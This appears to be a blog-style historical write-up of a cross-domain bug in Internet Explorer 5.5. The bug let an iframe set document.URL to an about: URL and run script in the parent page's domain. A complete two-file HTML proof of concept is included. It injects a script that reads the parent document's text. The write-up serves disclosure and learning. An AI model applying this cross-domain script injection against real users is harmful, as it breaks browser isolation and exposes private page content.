I was exploring a subtle difference between location.href = "about:blank" and document.URL = "about:blank" when called from inside an iframe. They behave differently in terms of which security domain the resulting about:blank page inherits. In IE 5.5, the about: protocol could carry arbitrary text after the colon, which made it possible to inject a script tag that ran in the parent’s domain. That full exploit only worked on IE 5.5, but the underlying document.URL domain-transfer quirk was still present and worth noting in later versions as a potential bridge to other techniques.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_IE55_documentURLAbout</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>xDom_IE55_documentURLAbout</h2>
</center>
<hr />
<br />
I know, I know. IE 5.5 is not "the issue" now, but this little bug is interesting because it "almost" works on IE6 and IE7 and it
opens a little bridge that -maybe- can be used for other things.<br /><br />
Usually, when you change the URL of an IFRAME from inside the iframe to about:blank, it will do it keeping the domain who changed
the URL. For example, if you do a location.href = "about:blank"  from inside an iframe, the domain of that "about:blank" will continue
belonging to the same iframe.<br /><br />

Now, the point here is that if you change the URL (to about:blank) using a document.URL instead a location.href, it will change
the domain to its parent.<br /><br />

So, during the old days of IE5.5, when you were able to do an about:anyText, you could simply write a script from inside an IFRAME
and access its parent document. During these days, you can't do the same thing, but you can change the URL to about:blank with
the parent domain.
<hr />
The iframe has a file with only this instruction:<br /><br />
<b>document.URL</b> ="about:&lt;script&gt;alert(parent.document.body.innerText)&lt;\/script&gt;";<br /><br />
Of course, it will work only on IE5.5, but -again- I think we should fix the document.URL = "about:blank" problem anyway because it may be a bridge to new holes.
<center>
<iframe src="http://differentdomain/anotherdomain.html" width="100" height="100"></iframe>
</center>
</body>
</html>

anotherdomain.html (hosted on a different domain, loaded in the iframe):

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_IE55_documentURLAbout</title></head>
<body>
This file should be located on a different domain than the top window.
<script language="JavaScript">
document.URL ="about:<script>alert(parent.document.body.innerText)<\/script>";
</script>
</body>
</html>

The key distinction is that document.URL = "about:..." (an IE-specific writable property) caused the resulting about: page to inherit the parent document’s security domain rather than keeping the iframe’s own domain — the opposite of what location.href does. On IE 5.5, about: accepted arbitrary text as content, so you could write about:<script>...</script> and have that script execute in the parent’s domain with full access to parent.document. On IE 6 and 7 the about:anyText feature was removed, but the domain-assignment quirk remained as a residual concern.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.